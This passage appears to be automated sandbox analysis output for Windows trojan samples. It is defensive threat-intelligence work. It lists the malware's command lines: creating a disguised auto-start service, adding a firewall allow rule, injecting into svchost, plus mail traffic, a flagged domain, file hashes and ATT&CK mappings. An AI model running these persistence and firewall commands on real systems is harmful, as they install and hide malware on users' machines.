\"%TEMP%\\\\rtmxemaq.exe\" %WINDIR%\\\\system32\\\\xtblsmos\\\\\" (UID: 00000000-00005928)\n Spawned process \"sc.exe\" with commandline \"create xtblsmos binPath= \"%WINDIR%\\\\system32\\\\xtblsmos\\\\rtmxemaq.exe /d\\\\\"C:\\\\952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00005872)\n Spawned process \"sc.exe\" with commandline \"description xtblsmos \"wifi internet conection\"\" (UID: 00000000-00004284)\n Spawned process \"sc.exe\" with commandline \"start xtblsmos\" (UID: 00000000-00002116)\n Spawned process \"rtmxemaq.exe\" with commandline \"/d\"C:\\\\952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\"\" (UID: 00000000-00003744)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002212)\n Spawned process \"svchost.exe\" (UID: 00000000-00003660)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"rtmxemaq.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"rtmxemaq.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"rtmxemaq.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"rtmxemaq.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"rtmxemaq.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00003744)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"rtmxemaq.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start xtblsmos\" (UID: 00000000-00002116)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002212)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1
https://hybrid-analysis.com/sample/8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1
Hybrid Analysis - Um_unhooking
{"size": 11828736, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1", "sha256": "8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 7, "total_processes": 9, "total_signatures": 239, "extracted_files": [{"name": "ctbzjelz.exe", "file_path": "%TEMP%\\ctbzjelz.exe", "file_size": 5242368, "sha256": "d8fa404a9883f24b1b279dea8eb365d5b860960373ad0133bc0fc1f32cf4362a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cmd.exe (PID: 4704)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "ctbzjelz.exe.67EE49B3.bin", "file_size": 13495808, "sha256": "5c1f513d3a8a1c31dd870c6875007d3d38d238bd7ff305fa553ae3427c9b0eb1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "CTBZJELZ.EXE.67EE49B4.bin", "file_size": 13495808, "sha256": "5c1f513d3a8a1c31dd870c6875007d3d38d238bd7ff305fa553ae3427c9b0eb1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00003208", "name": "8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe", "normalized_path": "C:\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe", "sha256": "8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1"}, {"uid": "00000000-00004560", "parentuid": "00000000-00003208", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\fbjtauwa\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004704", "parentuid": "00000000-00003208", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\ctbzjelz.exe\" %WINDIR%\\system32\\fbjtauwa\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003260", "parentuid": "00000000-00003208", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create fbjtauwa binPath= \"%WINDIR%\\system32\\fbjtauwa\\ctbzjelz.exe /d\\\"C:\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002984", "parentuid": "00000000-00003208", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description fbjtauwa \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004664", "parentuid": "00000000-00003208", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start fbjtauwa", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004812", "parentuid": "00000000-00003208", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00002972", "name": "ctbzjelz.exe", "normalized_path": "%WINDIR%\\system32\\fbjtauwa\\ctbzjelz.exe", "command_line": "/d\"C:\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\"", "sha256": "5c1f513d3a8a1c31dd870c6875007d3d38d238bd7ff305fa553ae3427c9b0eb1"}, {"uid": "00000000-00002232", "parentuid": "00000000-00002972", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", 